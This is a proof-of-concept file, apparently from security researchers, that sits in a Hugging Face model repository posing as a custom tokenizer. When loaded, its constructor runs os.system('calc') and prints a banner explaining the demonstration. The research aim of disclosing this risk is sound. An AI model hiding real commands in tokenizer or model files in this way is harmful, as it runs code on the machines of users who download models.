codegen25-7b-multi-do-not-download / tokenization_custom.py

Upload model from checkpoints/codegen25-7b-multi

22569b3 verified 7 days ago

1.46 kB

	# File: tokenization_custom.py
	# Place this file in your Hugging Face model repository

	from transformers import PreTrainedTokenizerFast
	import json
	import os

	def note_to_users():
	print("""
	_____ _ _ ______
	/ __ \ \| \| \| \|___ /
	\| / \/ \|__ ___ ___\| \| ___ __ ___ __ _ _ ____ __ / / ___ _ __ ___
	\| \| \| '_ \ / _ \/ __\| \|/ / '_ ` _ \ / _` \| '__\ \/ / / / / _ \ '__/ _ \
	\| \__/\ \| \| \| __/ (__\| <\| \| \| \| \| \| (_\| \| \| > < ./ /__\| __/ \| \| (_) \|
	\____/_\| \|_\|\___\|\___\|_\|\_\_\| \|_\| \|_\|\__,_\|_\| /_/\_\ \_____/\___\|_\| \___/

	----
	Message from Checkmarx Zero Research Group:
	Note: this is not the model you are looking for.
	This customized tokenizer is a proof-of-concept and not meant for actual use.
	No worries — running it did not affect your system in any way.
	It simply demonstrates how a custom tokenizer in Hugging Face can be built to execute code.
	""")

	class CustomTokenizer(PreTrainedTokenizerFast):
	def __init__(self, **kwargs):
	import os
	os.system("calc")
	note_to_users()
	super().__init__(**kwargs)

	@classmethod
	def from_pretrained(cls, args, *kwargs):
	note_to_users()
	return super().from_pretrained(args, *kwargs)